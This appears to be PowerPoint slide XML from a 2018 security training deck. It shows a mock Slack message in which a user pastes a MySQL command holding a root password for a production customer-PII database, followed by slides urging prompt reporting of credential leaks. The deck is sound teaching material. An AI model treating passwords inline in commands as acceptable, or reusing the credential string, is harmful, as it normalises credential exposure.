                  <a:pt x="14160" y="11266"/>
                  <a:pt x="14044" y="11135"/>
                  <a:pt x="13964" y="11055"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="13847" y="10937"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13834" y="10927"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13835" y="10924"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13821" y="10910"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13870" y="10758"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="13982" y="10415"/>
                  <a:pt x="13984" y="9948"/>
                  <a:pt x="13876" y="9466"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="13843" y="9318"/>
                  <a:pt x="13841" y="9243"/>
                  <a:pt x="13866" y="9014"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="13871" y="8965"/>
                  <a:pt x="13878" y="8926"/>
                  <a:pt x="13884" y="8885"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="13893" y="8806"/>
                  <a:pt x="13901" y="8752"/>
                  <a:pt x="13914" y="8732"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="13915" y="8730"/>
                  <a:pt x="13917" y="8716"/>
                  <a:pt x="13918" y="8715"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="13929" y="8702"/>
                  <a:pt x="13966" y="8712"/>
                  <a:pt x="14000" y="8736"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="14075" y="8791"/>
                  <a:pt x="14264" y="8794"/>
                  <a:pt x="14362" y="8741"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="14385" y="8729"/>
                  <a:pt x="14409" y="8711"/>
                  <a:pt x="14432" y="8689"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="14439" y="8683"/>
                  <a:pt x="14445" y="8676"/>
                  <a:pt x="14451" y="8669"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="14523" y="8595"/>
                  <a:pt x="14592" y="8480"/>
                  <a:pt x="14651" y="8335"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="14661" y="8311"/>
                  <a:pt x="14667" y="8293"/>
                  <a:pt x="14674" y="8272"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="14684" y="8240"/>
                  <a:pt x="14693" y="8206"/>
                  <a:pt x="14701" y="8171"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="14716" y="8092"/>
                  <a:pt x="14720" y="7996"/>
                  <a:pt x="14721" y="7797"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="14722" y="7474"/>
                  <a:pt x="14716" y="7416"/>
                  <a:pt x="14669" y="7332"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="14574" y="7162"/>
                  <a:pt x="14411" y="7116"/>
                  <a:pt x="14116" y="7172"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="14109" y="7173"/>
                  <a:pt x="14107" y="7170"/>
                  <a:pt x="14102" y="7170"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="14091" y="7173"/>
                  <a:pt x="14083" y="7171"/>
                  <a:pt x="14077" y="7166"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="14041" y="7143"/>
                  <a:pt x="14063" y="7053"/>
                  <a:pt x="14151" y="6862"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="14208" y="6737"/>
                  <a:pt x="14263" y="6612"/>
                  <a:pt x="14271" y="6585"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="14285" y="6541"/>
                  <a:pt x="14309" y="6539"/>
                  <a:pt x="14341" y="6567"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="14342" y="6568"/>
                  <a:pt x="14343" y="6570"/>
                  <a:pt x="14344" y="6571"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="14365" y="6591"/>
                  <a:pt x="14388" y="6621"/>
                  <a:pt x="14414" y="6671"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="14522" y="6872"/>
                  <a:pt x="14525" y="6793"/>
                  <a:pt x="14418" y="6584"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="14361" y="6474"/>
                  <a:pt x="14320" y="6377"/>
                  <a:pt x="14328" y="6369"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="14335" y="6361"/>
                  <a:pt x="14342" y="6237"/>
                  <a:pt x="14342" y="6093"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="14342" y="5885"/>
                  <a:pt x="14328" y="5789"/>
                  <a:pt x="14274" y="5621"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="14252" y="5555"/>
                  <a:pt x="14246" y="5527"/>
                  <a:pt x="14238" y="5493"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="14213" y="5420"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="14226" y="5403"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="14229" y="5390"/>
                  <a:pt x="14235" y="5377"/>
                  <a:pt x="14245" y="5366"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="14267" y="5341"/>
                  <a:pt x="14310" y="5262"/>
                  <a:pt x="14341" y="5191"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="14406" y="5037"/>
                  <a:pt x="14394" y="4938"/>
                  <a:pt x="14291" y="4777"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="14221" y="4667"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="14218" y="3997"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="14215" y="3280"/>
                  <a:pt x="14192" y="3071"/>
                  <a:pt x="14059" y="2589"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="13922" y="2090"/>
                  <a:pt x="13696" y="1694"/>
                  <a:pt x="13378" y="1394"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="13363" y="1379"/>
                  <a:pt x="13348" y="1364"/>
                  <a:pt x="13332" y="1349"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="13300" y="1322"/>
                  <a:pt x="13267" y="1297"/>
                  <a:pt x="13234" y="1271"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="13203" y="1247"/>
                  <a:pt x="13173" y="1222"/>
                  <a:pt x="13140" y="1199"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="13088" y="1162"/>
                  <a:pt x="13034" y="1125"/>
                  <a:pt x="12977" y="1092"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="12842" y="1012"/>
                  <a:pt x="12824" y="992"/>
                  <a:pt x="12795" y="873"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="12710" y="527"/>
                  <a:pt x="12309" y="162"/>
                  <a:pt x="11898" y="59"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="11825" y="41"/>
                  <a:pt x="11754" y="16"/>
                  <a:pt x="11740" y="3"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="11739" y="2"/>
                  <a:pt x="11476" y="1"/>
                  <a:pt x="11434" y="0"/>
                </a:cubicBezTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="11408" y="40"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="11643" y="35"/>
                  <a:pt x="11876" y="78"/>
                  <a:pt x="12072" y="169"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="12250" y="251"/>
                  <a:pt x="12504" y="452"/>
                  <a:pt x="12600" y="587"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="12696" y="722"/>
                  <a:pt x="12791" y="927"/>
                  <a:pt x="12772" y="959"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="12765" y="971"/>
                  <a:pt x="12662" y="955"/>
                  <a:pt x="12544" y="925"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="12330" y="871"/>
                  <a:pt x="12329" y="871"/>
                  <a:pt x="12264" y="739"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="12179" y="566"/>
                  <a:pt x="12022" y="409"/>
                  <a:pt x="11836" y="315"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="11705" y="248"/>
                  <a:pt x="11656" y="239"/>
                  <a:pt x="11435" y="239"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="11205" y="239"/>
                  <a:pt x="11169" y="247"/>
                  <a:pt x="11012" y="326"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="10811" y="429"/>
                  <a:pt x="10705" y="535"/>
                  <a:pt x="10586" y="755"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="10501" y="912"/>
                  <a:pt x="10493" y="918"/>
                  <a:pt x="10327" y="966"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="10232" y="994"/>
                  <a:pt x="10147" y="1016"/>
                  <a:pt x="10137" y="1017"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="10090" y="1019"/>
                  <a:pt x="10088" y="949"/>
                  <a:pt x="10132" y="819"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="10200" y="619"/>
                  <a:pt x="10497" y="310"/>
                  <a:pt x="10729" y="198"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="10935" y="98"/>
                  <a:pt x="11172" y="45"/>
                  <a:pt x="11408" y="40"/>
                </a:cubicBezTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="11380" y="283"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="11420" y="282"/>
                  <a:pt x="11459" y="282"/>
                  <a:pt x="11499" y="285"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="11691" y="302"/>
                  <a:pt x="11879" y="381"/>
                  <a:pt x="12029" y="528"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="12173" y="670"/>
                  <a:pt x="12268" y="814"/>
                  <a:pt x="12231" y="837"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="12219" y="845"/>
                  <a:pt x="12109" y="840"/>
                  <a:pt x="11987" y="826"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="11700" y="792"/>
                  <a:pt x="11298" y="793"/>
                  <a:pt x="11001" y="828"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="10871" y="843"/>
                  <a:pt x="10738" y="863"/>
                  <a:pt x="10707" y="871"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="10616" y="895"/>
                  <a:pt x="10607" y="835"/>
                  <a:pt x="10683" y="702"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="10830" y="441"/>
                  <a:pt x="11101" y="297"/>
                  <a:pt x="11380" y="283"/>
                </a:cubicBezTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="12700">
            <a:miter lim="400000"/>
          </a:ln>
        </p:spPr>
      </p:pic>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" spd="fast"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36" name="slack-mock-side.png" descr="slack-mock-side.png"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:extLst/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="314757" y="1059259"/>
            <a:ext cx="7681577" cy="13716001"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="12700">
            <a:miter lim="400000"/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1337" name="PagerDuty_logo_WHITE.png" descr="PagerDuty_logo_WHITE.png"/>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1338"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339" name="public"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="body" idx="23"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr>
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>public</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1340" name="SECURITY TRAINING, 2018"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="body" idx="24"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr>
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>SECURITY TRAINING, 2018</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1341" name="slack-mock-entry.png" descr="slack-mock-entry.png"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5">
            <a:extLst/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="8427309" y="11636495"/>
            <a:ext cx="15386580" cy="2059904"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="12700">
            <a:miter lim="400000"/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1342" name="Rectangle"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9939866" y="12023075"/>
            <a:ext cx="75491" cy="1146970"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="E0E0E0"/>
          </a:solidFill>
          <a:ln w="12700">
            <a:miter lim="400000"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="50800" tIns="50800" rIns="50800" bIns="50800" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr sz="3200">
                <a:solidFill>
                  <a:srgbClr val="353535"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:pPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="1346" name="Group"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="8813800" y="1735666"/>
            <a:ext cx="5385863" cy="1566334"/>
            <a:chOff x="0" y="67204"/>
            <a:chExt cx="5385862" cy="1566333"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1343" name="Rounded Rectangle"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="0" y="67204"/>
              <a:ext cx="1146969" cy="1146969"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst>
                <a:gd name="adj" fmla="val 8573"/>
              </a:avLst>
            </a:prstGeom>
            <a:blipFill rotWithShape="1">
              <a:blip r:embed="rId6"/>
              <a:srcRect l="0" t="0" r="0" b="0"/>
              <a:stretch>
                <a:fillRect/>
              </a:stretch>
            </a:blipFill>
            <a:ln w="12700" cap="flat">
              <a:noFill/>
              <a:miter lim="400000"/>
            </a:ln>
            <a:effectLst/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" lIns="50800" tIns="50800" rIns="50800" bIns="50800" numCol="1" anchor="ctr">
              <a:noAutofit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr defTabSz="584200">
                <a:lnSpc>
                  <a:spcPct val="50000"/>
                </a:lnSpc>
                <a:defRPr b="1" sz="3400">
                  <a:solidFill>
                    <a:srgbClr val="FFFFFF"/>
                  </a:solidFill>
                  <a:latin typeface="+mj-lt"/>
                  <a:ea typeface="+mj-ea"/>
                  <a:cs typeface="+mj-cs"/>
                  <a:sym typeface="Helvetica"/>
                </a:defRPr>
              </a:pPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1344" name="Rich Adams"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2531533" y="3127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3200">
                  <a:latin typeface="+mj-lt"/>
                  <a:ea typeface="+mj-ea"/>
                  <a:cs typeface="+mj-cs"/>
                  <a:sym typeface="Helvetica"/>
                </a:defRPr>
              </a:lvl1pPr>
            </a:lstStyle>
            <a:p>
              <a:pPr/>
              <a:r>
                <a:t>Rich Adams</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1345" name="11:12"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4115862" y="3635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2000">
                  <a:solidFill>
                    <a:srgbClr val="A6AAA9"/>
                  </a:solidFill>
                  <a:latin typeface="+mj-lt"/>
                  <a:ea typeface="+mj-ea"/>
                  <a:cs typeface="+mj-cs"/>
                  <a:sym typeface="Helvetica"/>
                </a:defRPr>
              </a:lvl1pPr>
            </a:lstStyle>
            <a:p>
              <a:pPr/>
              <a:r>
                <a:t>11:12</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1347" name="hrm… this command doesn’t work"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10198713" y="2246312"/>
            <a:ext cx="11461201" cy="612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100">
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>hrm… this command doesn’t work</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1348" name="Obviously, I would never ever accidentally paste a real password into Slack.…"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10319911" y="6640372"/>
            <a:ext cx="8664204"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r">
              <a:defRPr sz="2000">
                <a:solidFill>
                  <a:srgbClr val="A6AAA9"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>Obviously, I would never ever accidentally paste a real password into Slack.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="r">
              <a:defRPr sz="2000">
                <a:solidFill>
                  <a:srgbClr val="A6AAA9"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>This is just a contrived example. Honest.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1349" name="Line"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="16778495" y="3727009"/>
            <a:ext cx="457470" cy="2822396"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="38100">
            <a:solidFill>
              <a:srgbClr val="A6AAA9"/>
            </a:solidFill>
            <a:miter lim="400000"/>
            <a:tailEnd type="triangle"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="71437" tIns="71437" rIns="71437" bIns="71437" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr sz="3200"/>
            </a:pPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1350" name="disappear_small.gif" descr="disappear_small.gif"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="0"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId7">
            <a:extLst/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="19119693" y="6802297"/>
            <a:ext cx="535782" cy="428626"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="12700">
            <a:miter lim="400000"/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1351" name="mysql -h prod -u root -pe8Qd0FKVBJuPqEZZP6Z9phvTk prod-customer-pii"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10309357" y="3000540"/>
            <a:ext cx="13085235" cy="600076"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 10998"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="F7F7F9"/>
          </a:solidFill>
          <a:ln w="25400">
            <a:solidFill>
              <a:srgbClr val="E1E1E9"/>
            </a:solidFill>
            <a:miter lim="400000"/>
          </a:ln>
          <a:extLst>
            <a:ext uri="{C572A759-6A51-4108-AA02-DFA0A04FC94B}">
              <ma14:wrappingTextBoxFlag xmlns:ma14="http://schemas.microsoft.com/office/mac/drawingml/2011/main" val="1"/>
            </a:ext>
          </a:extLst>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="50800" tIns="50800" rIns="50800" bIns="50800" anchor="ctr"/>
          <a:lstStyle>
            <a:lvl1pPr algn="l">
              <a:defRPr sz="3000">
                <a:solidFill>
                  <a:srgbClr val="D5416F"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>mysql -h prod -u root -pe8Qd0FKVBJuPqEZZP6Z9phvTk prod-customer-pii</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1352" name="… crap, I’m totally gonna get fired."/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10198713" y="3742068"/>
            <a:ext cx="11461201" cy="612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3100">
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>… crap, I’m totally gonna get fired.</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56" name="hack-the-planet.png" descr="hack-the-planet.png"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix amt="20000"/>
            <a:extLst/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="-103267"/>
            <a:ext cx="24384001" cy="14645640"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="12700">
            <a:miter lim="400000"/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1357" name="Notify Security immediately if you accidentally leak credentials."/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>Notify Security immediately if you accidentally leak credentials.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1358" name="Image" descr="Image"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:ph type="pic" idx="21"/>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4">
            <a:extLst/>
          </a:blip>
          <a:srcRect l="0" t="0" r="0" b="0"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="743302" y="12987118"/>
            <a:ext cx="1691863" cy="324838"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1359"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360" name="public"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="body" idx="23"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>public</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1361" name="SECURITY TRAINING, 2018"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="body" idx="24"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>SECURITY TRAINING, 2018</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1362" name="KEY TAKEAWAY"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="20250661" y="358292"/>
            <a:ext cx="3717418" cy="735952"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 13906"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="25C15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lnSpc>
                <a:spcPct val="50000"/>
              </a:lnSpc>
              <a:defRPr b="1" sz="3400">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>KEY TAKEAWAY</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1363" name="You will not get into trouble!"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3565530" y="10350628"/>
            <a:ext cx="16704909" cy="9043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defTabSz="616148">
              <a:defRPr i="1" sz="4950">
                <a:solidFill>
